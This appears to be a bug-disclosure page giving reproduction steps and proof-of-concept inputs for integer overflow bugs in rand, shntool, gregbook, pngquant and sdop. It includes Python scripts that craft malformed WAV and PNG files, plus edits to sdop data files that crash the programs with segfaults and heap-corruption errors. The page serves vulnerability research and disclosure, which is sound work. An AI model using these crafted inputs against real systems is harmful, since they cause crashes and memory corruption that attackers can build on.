Program inputs that trigger the integer overflow bugs we found

Our test environment is 32bit Ubuntu 14.04

  1. rand
    $ wget http://archive.ubuntu.com/ubuntu/pool/universe/r/rand/rand_1.0.4.orig.tar.gz
    $ tar xzvf rand_1.0.4.orig.tar.gz
    $ cd rand-1.0.4/
    $ make
    $ ./rand -N 1073741825 -M 1073741829 -u > /dev/null
    Segmentation fault (core dumped)

  2. shntool
    $ wget http://www.etree.org/shnutils/shntool/dist/src/shntool-3.0.10.tar.gz
    $ tar xzvf shntool-3.0.10.tar.gz
    $ cd shntool-3.0.10/
    $ ./configure && make
    $ cd src/
    $ cat exploit.py

    import struct  
    import sys  
    
    CHANNEL = 1  
    BITS_PER_SAMPLE = 32  
    SAMPLE_RATE = 0x4  
    DURATION = 3  
    BYTE_RATE = SAMPLE_RATE * CHANNEL * BITS_PER_SAMPLE / 8  
    
    riff_sig = "RIFF"  
    riff_size = struct.pack("<I", 12 + 24 + DURATION * BYTE_RATE)  
    riff_format = "WAVE"  
    riff_header = riff_sig + riff_size + riff_format  
    
    header_sig = "fmt "  
    header_size = struct.pack("<I", 16)  
    audio_format = "\x01\x00"  
    channel_no = struct.pack("<H", CHANNEL)  
    sample_rate = struct.pack("<I", SAMPLE_RATE)  
    byte_rate = struct.pack("<I", BYTE_RATE)  
    block_align = struct.pack("<H", CHANNEL * BITS_PER_SAMPLE / 8)  
    bits_per_sample = struct.pack("<H", BITS_PER_SAMPLE)  
    header = header_sig + header_size + audio_format + channel_no + sample_rate + byte_rate + block_align + bits_per_sample  
    
    data_sig = "data"  
    
    data_header = struct.pack("<I",  DURATION * BYTE_RATE)  
    
    data_body = "a" * DURATION * BYTE_RATE  
    
    data = data_sig + data_header + data_body  
    
    content = riff_header + header + data  
    
    sys.stdout.write(content)  
    

    $ python exploit.py > poc.wav

    2.1 (alarm1, alarm8, alarm18)
    $ ./shntool cmp -c 134217729 poc.wav poc.wav
    Comparing [poc.wav] (0:03.000) and [poc.wav] (0:03.000) : 100% Segmentation fault (core dumped)

    2.2 (alarm2, alarm15, alarm19)
    $ ./shntool cmp -s -c 268435457 poc.wav poc.wav
    Scanning [poc.wav] and [poc.wav] : 100% OK

    Files are identical so far.

    Preparing to do a full comparison...

    Comparing [poc.wav] (0:03.000) and [poc.wav] (0:03.000) : 100% OK

    Contents of these files are identical.

    (Note)
    In this case no segmentation observed, but you can put
    'printf("bytes = %x * %x = %x\n", shift_secs, info1->rate, bytes);'
    to Line 314 of mode_cmp.c file to observe that integer overflow really
    occured in Line 312, and used for malloc() size.

  3. gregbook
    (alarm3 + one of alarm7~alarm10 : X configuration ('Depth' field of '/etc/X11/xorg.conf' file) decides which one of alarm7~alarm10 gets triggered.)
    $ wget https://sourceforge.net/projects/libpng/files/libpng16/older-releases/1.6.21/libpng-1.6.21.tar.gz
    $ tar xzvf libpng-1.6.21.tar.gz
    $ cd libpng-1.6.21/
    $ ./configure && make && sudo make install
    $ cd contrib/gregbook/
    $ cp Makefile.unx Makefile
    $ make rpng-x
    $ cat exploit.py

    import zlib  
    import struct  
    import sys  
    
    width = 8192  
    height = 524288 + 1  
    
    HEADER = "\x89\x50\x4e\x47\x0d\x0a\x1a\x0a"  
    
    width_field = struct.pack(">i", width)  
    height_field = struct.pack(">i", height)  
    bit_depth = "\x10"  
    color_type = "\x06"  
    compression_type = "\x00"  
    filter_type = "\x00"  
    interlace_type = "\x00"  
    
    IHDR_data = width_field + height_field + bit_depth + color_type + \  
              compression_type + filter_type + interlace_type  
    IHDR_size = struct.pack(">i", len(IHDR_data))  
    IHDR_crc32 = struct.pack(">i", zlib.crc32("IHDR" + IHDR_data))  
    IHDR = IHDR_size + "IHDR" + IHDR_data + IHDR_crc32  
    
    dummy_data = "\x01" * (width * 3 + 1)  
    IDAT_data = zlib.compress(dummy_data * 0x64)  
    IDAT_size  = struct.pack(">i", len(IDAT_data))  
    IDAT_crc32 = struct.pack(">i", zlib.crc32("IDAT" + IDAT_data))  
    IDAT = IDAT_size + "IDAT" + IDAT_data + IDAT_crc32  
    
    IEND = "\x00\x00\x00\x00\x49\x45\x4e\x44\xae\x42\x60\x82"  
    
    sys.stdout.write(HEADER + IHDR + IDAT * 1 + IEND)  
    

    $ python exploit.py > poc.png
    $ ./rpng-x poc.png
    $ ./pngquant poc.png
    error: IDAT: incorrect data check (libpng failed)
    *** Error in './rpng-x': free(): invalid next size (normal): 0x995d5d8 ***
    Aborted (core dumped)

  4. pngquant
    (alarm3, alarm8)
    $ wget https://sourceforge.net/projects/libpng/files/libpng16/older-releases/1.6.21/libpng-1.6.21.tar.gz
    $ tar xzvf libpng-1.6.21.tar.gz
    $ cd libpng-1.6.21/
    $ ./configure && make && sudo make install
    $ wget http://pngquant.org/pngquant-2.7.0-src.tar.gz
    $ tar xzvf pngquant-2.7.0-src.tar.gz
    $ cd pngquant-2.7.0
    $ ./configure && make
    $ cat exploit.py

    import zlib  
    import struct  
    import sys  
    
    width = 2048  
    height = 524288 + 1  
    
    HEADER = "\x89\x50\x4e\x47\x0d\x0a\x1a\x0a"  
    
    width_field = struct.pack(">i", width)  
    height_field = struct.pack(">i", height)  
    bit_depth = "\x10"  
    color_type = "\x06"  
    compression_type = "\x00"  
    filter_type = "\x00"  
    interlace_type = "\x00"  
    
    IHDR_data = width_field + height_field + bit_depth + color_type + \  
              compression_type + filter_type + interlace_type  
    IHDR_size = struct.pack(">i", len(IHDR_data))  
    IHDR_crc32 = struct.pack(">i", zlib.crc32("IHDR" + IHDR_data))  
    IHDR = IHDR_size + "IHDR" + IHDR_data + IHDR_crc32  
    
    dummy_data = "\x01" * (width * 3 + 1)  
    IDAT_data = zlib.compress(dummy_data * 0x64)  
    IDAT_size  = struct.pack(">i", len(IDAT_data))  
    IDAT_crc32 = struct.pack(">i", zlib.crc32("IDAT" + IDAT_data))  
    IDAT = IDAT_size + "IDAT" + IDAT_data + IDAT_crc32  
    
    IEND = "\x00\x00\x00\x00\x49\x45\x4e\x44\xae\x42\x60\x82"  
    
    sys.stdout.write(HEADER + IHDR + IDAT * 1 + IEND)  
    

    $ python exploit.py > poc.png
    $ ./pngquant poc.png
    error: IDAT: incorrect data check (libpng failed)
    *** Error in './pngquant': munmap_chunk(): invalid pointer: 0x081ae368 ***
    Aborted (core dumped)

  5. sdop

    Caution : You must uninstall the libpng library installed in 3,4. Otherwise, compile fails.

    $ wget https://launchpad.net/ubuntu/+archive/primary/+files/sdop_0.61.orig.tar.gz
    $ tar xvzf sdop_0.61.orig.tar.gz
    $ cd sdop-0.61
    $ sed -i 's/sdop \$(SDOBJ)/sdop \$(SDOBJ) \$(LIBS)/g' src/Makefile
    $ ./configure && make && sudo make install

    5.1 (alarm1)
    $ cp /usr/local/share/sdop/HyphenData HyphenData.bak
    $ sudo vim /usr/local/share/sdop/HyphenData
    $ echo "536870912" | sudo tee /usr/local/share/sdop/HyphenData
    $ cat /usr/local/share/sdop/HyphenData
    536870912
    $ sdop
    Segmentation fault (core dumped)
    $ sudo cp HyphenData.bak /usr/local/share/sdop/HyphenData

    5.2 (alarm3)
    $ cp /usr/local/share/sdop/fontmetrics/Times-Roman.afm Times-Roman.afm.bak
    $ sudo sed -i '/StartCharMetrics/,/EndCharMetrics/{//!d}' /usr/local/share/sdop/fontmetrics/Times-Roman.afm
    $ sudo sed -i 's/StartCharMetrics 314/StartCharMetrics/g' /usr/local/share/sdop/fontmetrics/Times-Roman.afm
    $ sudo sed -i 's/StartKernPairs 2073/StartKernPairs 536870913/g' /usr/local/share/sdop/fontmetrics/Times-Roman.afm
    $ cat poc.doc

    <section>  
    </section>  
    

    $ sdop poc.doc
    Segmentation fault (core dumped)
    $ sudo cp Times-Roman.afm.bak /usr/local/share/sdop/fontmetrics/Times-Roman.afm

    5.3 (alarm5, alarm6)
    $ cp /usr/local/share/sdop/indexcollate indexcollate.bak
    $ python -c 'print "7fffffff\n10000000"' | sudo tee /usr/local/share/sdop/indexcollate
    $ cat poc.doc

    <indexterm>term</indexterm>  
    <index role="">idx</index>  
    

    $ sdop poc.doc
    Segmentation fault (core dumped)